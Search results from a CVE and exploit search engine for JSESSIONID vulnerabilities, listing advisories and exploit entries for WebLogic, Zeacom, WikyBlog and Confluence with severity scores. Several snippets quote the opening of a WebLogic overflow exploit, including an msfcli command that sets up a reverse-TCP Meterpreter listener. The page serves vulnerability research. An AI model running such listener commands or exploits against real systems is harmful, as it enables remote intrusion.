CVE Search Engine - Security Vulnerabilities and Exploits Search Tool

show all

168 matches found

Cvelist•added 2011/05/20 10:0 p.m.•24 views

CVE-2010-0217

Zeacom Chat Server before 5.1 uses too short a random string for the JSESSIONID value, which makes it easier for remote attackers to hijack sessions or cause a denial of service Chat Server crash or Tomcat daemon crash via a brute-force attack...

6.6AI score0.01282EPSS

Exploits1References5

exploitpack•added 2011/04/19 12:0 a.m.•28 views

Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - jdeE1Menu_Menu.mafService?e1.namespace Cross-Site Scripting

Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - jdeE1MenuMenu.mafService?e1.namespace Cross-Site Scripting source: https://www.securityfocus.com/bid/47479/info Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities. An attacker may leverage these...

Exploits0

Exploit DB•added 2010/07/03 12:0 a.m.•47 views

BEA WebLogic - JSESSIONID Cookie Value Overflow (Metasploit)

$Id: beaweblogicjsessionid.rb 9670 2010-07-03 03:19:07Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use...

10CVSS6.6AI score0.61309EPSS

Exploits12

Prion•added 2010/02/27 12:30 a.m.•11 views

Session fixation

Session fixation vulnerability in WikyBlog 1.7.3 rc2 allows remote attackers to hijack web sessions by setting the jsessionid parameter to 1 index.php/Comment/Main, 2 index.php/Comment/Main/HomeWiky, or 3 index.php/Edit/Main...

5.8CVSS7.2AI score0.01832EPSS

Exploits1References4Affected Software1

NVD•added 2010/02/27 12:30 a.m.•21 views

CVE-2010-0756

5.8CVSS6.7AI score0.01832EPSS

Exploits1References4

Packet Storm•added 2010/02/25 12:0 a.m.•38 views

WikyBlog 1.7.3rc2 XSS / Shell Upload / RFI

Exploits0

exploitpack•added 2010/02/24 12:0 a.m.•14 views

WikyBlog 1.7.3rc2 - Multiple Vulnerabilities

WikyBlog 1.7.3rc2 - Multiple Vulnerabilities ======================================================================================== | Title : WikyBlog-1.7.3rc2 Mullti Vulnerability | Author : indoushka | email : [email protected] | Home : www.iq-ty.com | Web Site : http://www.wikyblog.com/ ...

0.2AI score

Exploits0

Packet Storm•added 2009/11/26 12:0 a.m.•58 views

BEA Weblogic JSESSIONID Cookie Value Overflow

This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core' class Metasploit3 'BEA Weblogic...

10CVSS0.3AI score0.61309EPSS

Exploits12

Atlassian•added 2009/05/20 6:5 p.m.•27 views

CSRF attack message thrown when JSESSIONID is changed

panel:bgColor=e7f4fa NOTE: This suggestion is for Confluence Server. Using Confluence Cloud? See the corresponding suggestion|http://jira.atlassian.com/browse/CONFCLOUD-15779. panel Symptoms: Anything that is using DWR will fail. Meaning: page editor is fully or partially unusable and it may...

Exploits0Affected Software1

Atlassian•added 2009/05/20 6:5 p.m.•26 views

CSRF attack message thrown when JSESSIONID is changed

Symptoms: Anything that is using DWR will fail. Meaning: page editor is fully or partially unusable and it may display the text "Draft saving timed out" on top of the text area. At the same time, the following error messages are printed in the Confluence log: noformat 2009-05-15 08:06:36,011 ERRO...

0.1AI score

Exploits0Affected Software1

Atlassian•added 2009/05/20 6:5 p.m.•24 views

CSRF attack message thrown when JSESSIONID is changed

panel:bgColor=e7f4fa NOTE: This suggestion is for Confluence Cloud. Using Confluence Server? See the corresponding suggestion|http://jira.atlassian.com/browse/CONFSERVER-15779. panel Symptoms: Anything that is using DWR will fail. Meaning: page editor is fully or partially unusable and it may...

Exploits0Affected Software1

Saint•added 2009/04/10 12:0 a.m.•51 views

Oracle WebLogic Server IIS Connector JSESSIONID buffer overflow

Added: 04/10/2009 CVE: CVE-2008-5457 BID: 33177 Background Oracle WebLogic Server formerly BEA WebLogic Server is a Java web application platform. Problem A buffer overflow vulnerability in the WebLogic IIS connector allows remote attackers to execute arbitrary commands by sending a long, special...

10CVSS7.5AI score0.61309EPSS

Exploits12

Saint•added 2009/04/10 12:0 a.m.•63 views

Oracle WebLogic Server IIS Connector JSESSIONID buffer overflow

10CVSS7.6AI score0.61309EPSS

Exploits12

myhack58•added 2009/04/03 12:0 a.m.•20 views

Oracle WebLogic IIS connector JSESSIONID Remote Overflow Exploit-vulnerability warning-the black bar safety net

Information source: milw0rm.com Copy the contents to the clipboard Code: !/ usr/bin/perl No point in keeping this private anymore! ksOSe - 02/16/2009 - CVE-2 0 0 8-5 4 5 7 Tested on w2k sp4 and w2k3 R2 sp2 no NX cohelet framework-3.2 ./ msfcli multi/handler...

Exploits0

seebug.org•added 2009/04/02 12:0 a.m.•46 views

Oracle WebLogic IIS connector JSESSIONID Remote Overflow Exploit

No description provided by source. !/usr/bin/perl No point in keeping this private anymore! ksOSe - 02/16/2009 - CVE-2008-5457 Tested on w2k sp4 and w2k3 R2 sp2 no NX cohelet framework-3.2 ./msfcli multi/handler PAYLOAD=windows/reflectivemeterpreter/reversetcp LHOST=10.10.10.1 LPORT=80 E Please...

10CVSS0.2AI score0.61309EPSS

Exploits12

exploitpack•added 2009/04/01 12:0 a.m.•41 views

Oracle WebLogic IIS connector JSESSIONID - Remote Overflow

Oracle WebLogic IIS connector JSESSIONID - Remote Overflow !/usr/bin/perl No point in keeping this private anymore! ksOSe - 02/16/2009 - CVE-2008-5457 Tested on w2k sp4 and w2k3 R2 sp2 no NX cohelet framework-3.2 ./msfcli multi/handler PAYLOAD=windows/reflectivemeterpreter/reversetcp...

10CVSS0.3AI score0.61309EPSS

Exploits12

0day.today•added 2009/04/01 12:0 a.m.•58 views

Oracle WebLogic IIS connector JSESSIONID Remote Overflow Exploit

Exploit for windows platform in category remote exploits ================================================================ Oracle WebLogic IIS connector JSESSIONID Remote Overflow Exploit ================================================================ !/usr/bin/perl No point in keeping this priva...

7.1AI score0.61309EPSS

Exploits12

Exploit DB•added 2009/04/01 12:0 a.m.•53 views

Oracle WebLogic IIS connector JSESSIONID - Remote Overflow

!/usr/bin/perl No point in keeping this private anymore! ksOSe - 02/16/2009 - CVE-2008-5457 Tested on w2k sp4 and w2k3 R2 sp2 no NX cohelet framework-3.2 ./msfcli multi/handler PAYLOAD=windows/reflectivemeterpreter/reversetcp LHOST=10.10.10.1 LPORT=80 E Please wait while we load the module tree...

10CVSS7AI score0.61309EPSS

Exploits12

Metasploit•added 2009/03/27 7:3 p.m.•50 views

BEA WebLogic JSESSIONID Cookie Value Overflow

This module exploits a buffer overflow in BEA's WebLogic plugin. The vulnerable code is only accessible when clustering is configured. A request containing a long JSESSION cookie value can lead to arbitrary code execution. This module requires Metasploit: https://metasploit.com/download Current...

10CVSS7.9AI score0.61309EPSS

Exploits12

Atlassian•added 2009/01/05 1:54 p.m.•21 views

Assignment of JSESSIONIDs

panel:bgColor=e7f4fa NOTE: This suggestion is for Confluence Cloud. Using Confluence Server? See the corresponding suggestion|http://jira.atlassian.com/browse/CONFSERVER-14112. panel I believe it should be a feature in future versions of Confluence to assign a different JSESSIONID to the user's...

2.3AI score

Exploits0Affected Software1

Rows per page

Query Builder

Family

Bulletin Type

Min CVSS Score

Date

Order by